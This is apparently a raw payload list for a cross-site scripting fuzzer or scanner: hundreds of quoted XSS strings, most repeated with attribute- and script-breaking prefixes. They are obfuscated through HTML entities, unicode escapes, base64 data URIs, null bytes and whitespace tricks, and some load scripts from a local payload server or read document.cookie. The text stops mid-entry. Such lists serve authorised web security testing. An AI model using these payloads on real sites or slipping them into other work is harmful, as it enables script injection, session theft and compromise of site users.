'<iframe/src="data:text/html;&Tab;base64&Tab;,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '"><iframe/src="data:text/html;&Tab;base64&Tab;,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '\'><iframe/src="data:text/html;&Tab;base64&Tab;,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">', '<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/', '"><script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/', "'><script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/", "&#34;&#62;<h1/onmouseover='\\u0061lert(1)'>%00", '<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">', '"><iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">', '\'><iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">', '<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>', '"><meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>', '\'><meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>', "<svg><script xlink:href=data&colon;,window.open('https://127.0.0.1:3555/xss_serve_payloads/X.html')></script", '"><svg><script xlink:href=data&colon;,window.open(\'https://127.0.0.1:3555/xss_serve_payloads/X.html\')></script', "'><svg><script xlink:href=data&colon;,window.open('https://127.0.0.1:3555/xss_serve_payloads/X.html')></script", "<svg><script x:href='http://127.0.0.1:3555/xss_serve_payloads/X.js'", '"><svg><script x:href=\'http://127.0.0.1:3555/xss_serve_payloads/X.js\'', "'><svg><script x:href='http://127.0.0.1:3555/xss_serve_payloads/X.js'", "<svg><script x:href='http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp'", '"><svg><script x:href=\'http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp\'', "'><svg><script x:href='http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp'", '<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">', '"><meta http-equiv="refresh" content="0;url=javascript:confirm(1)">', '\'><meta http-equiv="refresh" content="0;url=javascript:confirm(1)">', '<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>', '"><iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>', "'><iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>", '<form><a href="javascript:\\u0061lert&#x28;1&#x29;">X', '"><form><a href="javascript:\\u0061lert&#x28;1&#x29;">X', '\'><form><a href="javascript:\\u0061lert&#x28;1&#x29;">X', '</script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror=\'eval(src)\'>', '"></script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror=\'eval(src)\'>', '\'></script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror=\'eval(src)\'>', '<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>', '"><img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>', "'><img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>", '<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>', '"><form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>', '\'><form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>', '<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="&#09;&#10;&#11;>X</a', '"><a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="&#09;&#10;&#11;>X</a', '\'><a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="&#09;&#10;&#11;>X</a', 'http://www.keralacyberforce<script .in>alert(document.location)</script', '<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a', '"><a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a', '\'><a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a', "<img/src=@&#32;&#13; onerror = prompt('&#49;')", '"><img/src=@&#32;&#13; onerror = prompt(\'&#49;\')', "'><img/src=@&#32;&#13; onerror = prompt('&#49;')", "<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;", '"><style/onload=prompt&#40;\'&#88;&#83;&#83;\'&#41;', "'><style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;", '<script ^__^>alert(String.fromCharCode(49))</script ^__^', '"><script ^__^>alert(String.fromCharCode(49))</script ^__^', "'><script ^__^>alert(String.fromCharCode(49))</script ^__^", '</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(', '"></style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(', "'></style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(", '&#00;</form><input type&#61;"date" onfocus="alert(1)">', "<form><textarea &#13; onkeyup='\\u0061\\u006C\\u0065\\u0072\\u0074&#x28;1&#x29;'>", '"><form><textarea &#13; onkeyup=\'\\u0061\\u006C\\u0065\\u0072\\u0074&#x28;1&#x29;\'>', "'><form><textarea &#13; onkeyup='\\u0061\\u006C\\u0065\\u0072\\u0074&#x28;1&#x29;'>", "<script /***/>/***/confirm('\\uFF41\\uFF4C\\uFF45\\uFF52\\uFF54\\u1455\\uFF11\\u1450')/***/</script /***/", '"><script /***/>/***/confirm(\'\\uFF41\\uFF4C\\uFF45\\uFF52\\uFF54\\u1455\\uFF11\\u1450\')/***/</script /***/', "'><script /***/>/***/confirm('\\uFF41\\uFF4C\\uFF45\\uFF52\\uFF54\\u1455\\uFF11\\u1450')/***/</script /***/", "<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>", '"><iframe srcdoc=\'&lt;body onload=prompt&lpar;1&rpar;&gt;\'>', "'><iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>", '<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>', '"><a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>', '\'><a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>', '<script ~~~>alert(0%0)</script ~~~>', '"><script ~~~>alert(0%0)</script ~~~>', "'><script ~~~>alert(0%0)</script ~~~>", '<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>', '"><style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>', "'><style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>", "<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN", '"><///style///><span %2F onmousemove=\'alert&lpar;1&rpar;\'>SPAN', "'><///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN", "<img/src='http://127.0.0.1:3555/xss_serve_payloads/jpg.jpg' onmouseover=&Tab;prompt(1)", '"><img/src=\'http://127.0.0.1:3555/xss_serve_payloads/jpg.jpg\' onmouseover=&Tab;prompt(1)', "'><img/src='http://127.0.0.1:3555/xss_serve_payloads/jpg.jpg' onmouseover=&Tab;prompt(1)", "&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'", '&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}', "<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^", '"><marquee onstart=\'javascript:alert&#x28;1&#x29;\'>^__^', "'><marquee onstart='javascript:alert&#x28;1&#x29;'>^__^", '<div/style="width:expression(confirm(1))">X</div>', '"><div/style="width:expression(confirm(1))">X</div>', '\'><div/style="width:expression(confirm(1))">X</div> {IE7}', '"><div/style="width:expression(confirm(1))">X</div>', '"><div/style="width:expression(confirm(1))">X</div>', '\'><div/style="width:expression(confirm(1))">X</div> {IE7}', '\'><div/style="width:expression(confirm(1))">X</div>', '"><div/style="width:expression(confirm(1))">X</div>', '\'><div/style="width:expression(confirm(1))">X</div> {IE7}', '<iframe/%00/ src=javaSCRIPT&colon;alert(1)', '"><iframe/%00/ src=javaSCRIPT&colon;alert(1)', "'><iframe/%00/ src=javaSCRIPT&colon;alert(1)", "//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//", '/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>', "//|\\\\ <script //|\\\\ src='http://127.0.0.1:3555/xss_serve_payloads/X.js'> //|\\\\ </script //|\\\\", "//|\\\\ <script //|\\\\ src='http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp'> //|\\\\ </script //|\\\\", "</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>", '"></font>/<svg><style>{src&#x3A;\'<style/onload=this.onload=confirm(1)>\'</font>/</style>', "'></font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>", '<a/href="javascript:&#13; javascript:prompt(1)"><input type="X">', '"><a/href="javascript:&#13; javascript:prompt(1)"><input type="X">', '\'><a/href="javascript:&#13; javascript:prompt(1)"><input type="X">', '</plaintext\\></|\\><plaintext/onmouseover=prompt(1)', '"></plaintext\\></|\\><plaintext/onmouseover=prompt(1)', "'></plaintext\\></|\\><plaintext/onmouseover=prompt(1)", "</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29;", '"></svg>\'\'<svg><script \'AQuickBrownFoxJumpsOverTheLazyDog\'>alert&#x28;1&#x29;', "'></svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29;", '<a href="javascript&colon;\\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>', '"><a href="javascript&colon;\\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>', '\'><a href="javascript&colon;\\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>', "<div onmouseover='alert&lpar;1&rpar;'>DIV</div>", '"><div onmouseover=\'alert&lpar;1&rpar;\'>DIV</div>', "'><div onmouseover='alert&lpar;1&rpar;'>DIV</div>", '<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">', '"><iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">', '\'><iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">', '<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>', '"><a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>', '\'><a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>', '<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>X</a>', '"><a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>X</a>', "'><a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>X</a>", '<img src="/" =_=" title="onerror=\'prompt(1)\'">', '"><img src="/" =_=" title="onerror=\'prompt(1)\'">', '\'><img src="/" =_=" title="onerror=\'prompt(1)\'">', "<%<!--'%><script>alert(1);</script -->", '"><%<!--\'%><script>alert(1);</script -->', "'><%<!--'%><script>alert(1);</script -->", '<script src="data:text/javascript,alert(1)"></script>', '"><script src="data:text/javascript,alert(1)"></script>', '\'><script src="data:text/javascript,alert(1)"></script>', '<iframe/src \\/\\/onload = prompt(1)', '"><iframe/src \\/\\/onload = prompt(1)', "'><iframe/src \\/\\/onload = prompt(1)", '<iframe/onreadystatechange=alert(1)', '"><iframe/onreadystatechange=alert(1)', "'><iframe/onreadystatechange=alert(1)", '<svg/onload=alert(1)', '"><svg/onload=alert(1)', "'><svg/onload=alert(1)", '<input value=<><iframe/src=javascript:confirm(1)', '"><input value=<><iframe/src=javascript:confirm(1)', "'><input value=<><iframe/src=javascript:confirm(1)", '<input type="text" value=`` <div/onmouseover=\'alert(1)\'>X</div>', '"><input type="text" value=`` <div/onmouseover=\'alert(1)\'>X</div>', '\'><input type="text" value=`` <div/onmouseover=\'alert(1)\'>X</div>', 'http://www.<script>alert(1)</script .com', '<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>', '"><iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>', "'><iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>", '<svg><script ?>alert(1)', '"><svg><script ?>alert(1)', "'><svg><script ?>alert(1)", '<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>', '"><iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>', "'><iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>", '<img src=`xx:xx`onerror=alert(1)>', '"><img src=`xx:xx`onerror=alert(1)>', "'><img src=`xx:xx`onerror=alert(1)>", '<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>', '"><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>', '\'><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>', '<math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/X.js">X', '"><math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/X.js">X', '\'><math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/X.js">X', '<math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/bmpz.bmp">X', '"><math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/bmpz.bmp">X', '\'><math><a xlink:href="//127.0.0.1:3555/xss_serve_payloads/bmpz.bmp">X', '<embed code="http://127.0.0.1:3555/xss_serve_payloads/X.swf" allowscriptaccess=always>', '"><embed code="http://127.0.0.1:3555/xss_serve_payloads/X.swf" allowscriptaccess=always>', '\'><embed code="http://127.0.0.1:3555/xss_serve_payloads/X.swf" allowscriptaccess=always>', '<svg contentScriptType=text/vbs><script>MsgBox+1', '"><svg contentScriptType=text/vbs><script>MsgBox+1', "'><svg contentScriptType=text/vbs><script>MsgBox+1", '<a href="data:text/html;base64_,<svg/onload=\\u0061&#x6C;&#101%72t(1)>">X</a', '"><a href="data:text/html;base64_,<svg/onload=\\u0061&#x6C;&#101%72t(1)>">X</a', '\'><a href="data:text/html;base64_,<svg/onload=\\u0061&#x6C;&#101%72t(1)>">X</a', "<iframe/onreadystatechange=\\u0061\\u006C\\u0065\\u0072\\u0074('\\u0061') worksinIE>", '"><iframe/onreadystatechange=\\u0061\\u006C\\u0065\\u0072\\u0074(\'\\u0061\') worksinIE>', "'><iframe/onreadystatechange=\\u0061\\u006C\\u0065\\u0072\\u0074('\\u0061') worksinIE>", "<script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+", "</ScrIpt><script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+", '"><script>~\'\\u0061\' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~\'\\u0061\')</script U+', "</ScrIpt><script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+", "'><script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+", "</ScrIpt><script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+", '<script/src="data&colon;text%2Fj\\u0061v\\u0061script,\\u0061lert(\'\\u0061\')"></script a=\\u0061 & /=%2F', '"><script/src="data&colon;text%2Fj\\u0061v\\u0061script,\\u0061lert(\'\\u0061\')"></script a=\\u0061 & /=%2F', '\'><script/src="data&colon;text%2Fj\\u0061v\\u0061script,\\u0061lert(\'\\u0061\')"></script a=\\u0061 & /=%2F', '<script/src=data&colon;text/j\\u0061v\\u0061&#115&#99&#114&#105&#112&#116,\\u0061%6C%65%72%74(/X/)></script', '"><script/src=data&colon;text/j\\u0061v\\u0061&#115&#99&#114&#105&#112&#116,\\u0061%6C%65%72%74(/X/)></script', "'><script/src=data&colon;text/j\\u0061v\\u0061&#115&#99&#114&#105&#112&#116,\\u0061%6C%65%72%74(/X/)></script", '<object data=javascript&colon;\\u0061&#x6C;&#101%72t(1)>', '"><object data=javascript&colon;\\u0061&#x6C;&#101%72t(1)>', "'><object data=javascript&colon;\\u0061&#x6C;&#101%72t(1)>", '<script>+-+-1-+-+alert(1)</script>', '</ScrIpt><script>+-+-1-+-+alert(1)</script>', '"><script>+-+-1-+-+alert(1)</script>', '</ScrIpt><script>+-+-1-+-+alert(1)</script>', "'><script>+-+-1-+-+alert(1)</script>", '</ScrIpt><script>+-+-1-+-+alert(1)</script>', '<body/onload=&lt;!--&gt;&#10alert(1)>', '"><body/onload=&lt;!--&gt;&#10alert(1)>', "'><body/onload=&lt;!--&gt;&#10alert(1)>", '<script allbrowserX>/*<script* */alert(1)</script', '"><script allbrowserX>/*<script* */alert(1)</script', "'><script allbrowserX>/*<script* */alert(1)</script", '<img src ?X?\\/onerror = alert(1)', '"><img src ?X?\\/onerror = alert(1)', "'><img src ?X?\\/onerror = alert(1)", '<svg><script>//&NewLine;confirm(1);</script </svg>', '"><svg><script>//&NewLine;confirm(1);</script </svg>', "'><svg><script>//&NewLine;confirm(1);</script </svg>", '<svg><script onlypossibleinopera:-)> alert(1)', '"><svg><script onlypossibleinopera:-)> alert(1)', "'><svg><script onlypossibleinopera:-)> alert(1)", '<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>X', '"><a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>X', "'><a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>X", '<script x> alert(1) </script 1=2', '"><script x> alert(1) </script 1=2', "'><script x> alert(1) </script 1=2", '<div/onmouseover=\'alert(1)\'> style="x:">', '"><div/onmouseover=\'alert(1)\'> style="x:">', '\'><div/onmouseover=\'alert(1)\'> style="x:">', '<--`<img/src=` onerror=alert(1)> --!>', '"><--`<img/src=` onerror=alert(1)> --!>', "'><--`<img/src=` onerror=alert(1)> --!>", '<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>', '"><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>', "'><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>", '<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>', '"><div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>', '\'><div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>', "<img src=x onerror=window.open('http://127.0.0.1:3555/xss_serve_payloads/X.html');>", '"><img src=x onerror=window.open(\'http://127.0.0.1:3555/xss_serve_payloads/X.html\');>', "'><img src=x onerror=window.open('http://127.0.0.1:3555/xss_serve_payloads/X.html');>", '<form><button formaction=javascript&colon;alert(1)>X', '"><form><button formaction=javascript&colon;alert(1)>X', "'><form><button formaction=javascript&colon;alert(1)>X", '<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>', '"><iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>', '\'><iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>', '<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">X</a>', '"><a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">X</a>', '\'><a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">X</a>', '<sVg><scRipt %00>prompt&lpar;/', '"><sVg><scRipt %00>prompt&lpar;/', "'><sVg><scRipt %00>prompt&lpar;/", "w=window.open('invalidfileinvalidfileinvalidfile','target');setTimeout('alert(w.document.location);w.close();',1);", 'try%7Balert(1)%7Dcatch(e)%7Blocation.reload()%7D', '<div id="alert(\'/X/\')" style="x:expression(eval)(id)">', '"><div id="alert(\'/X/\')" style="x:expression(eval)(id)">', '\'><div id="alert(\'/X/\')" style="x:expression(eval)(id)">', '0\\%22))}catch(e){alert(1)}//', '<img language=vbs src=<b onerror=alert#1/1#>', '"><img language=vbs src=<b onerror=alert#1/1#>', "'><img language=vbs src=<b onerror=alert#1/1#>", "<script>alert(1)/X/'</script>", "</ScrIpt><script>alert(1)/X/'</script>", '"><script>alert(1)/X/\'</script>', "</ScrIpt><script>alert(1)/X/'</script>", "'><script>alert(1)/X/'</script>", "</ScrIpt><script>alert(1)/X/'</script>", "<script>alert(1)<!-- '</script>", "</ScrIpt><script>alert(1)<!-- '</script>", '"><script>alert(1)<!-- \'</script>', "</ScrIpt><script>alert(1)<!-- '</script>", "'><script>alert(1)<!-- '</script>", "</ScrIpt><script>alert(1)<!-- '</script>", '<script> var a = "X"; alert(1); </script>', '</ScrIpt><script> var a = "X"; alert(1); </script>', '"><script> var a = "X"; alert(1); </script>', '</ScrIpt><script> var a = "X"; alert(1); </script>', '\'><script> var a = "X"; alert(1); </script>', '</ScrIpt><script> var a = "X"; alert(1); </script>', "<script> var a=1'; alert(1); </script>", "</ScrIpt><script> var a=1'; alert(1); </script>", '"><script> var a=1\'; alert(1); </script>', "</ScrIpt><script> var a=1'; alert(1); </script>", "'><script> var a=1'; alert(1); </script>", "</ScrIpt><script> var a=1'; alert(1); </script>", '<script> var x = "X\\"; alert(1); </script>', '</ScrIpt><script> var x = "X\\"; alert(1); </script>', '"><script> var x = "X\\"; alert(1); </script>', '</ScrIpt><script> var x = "X\\"; 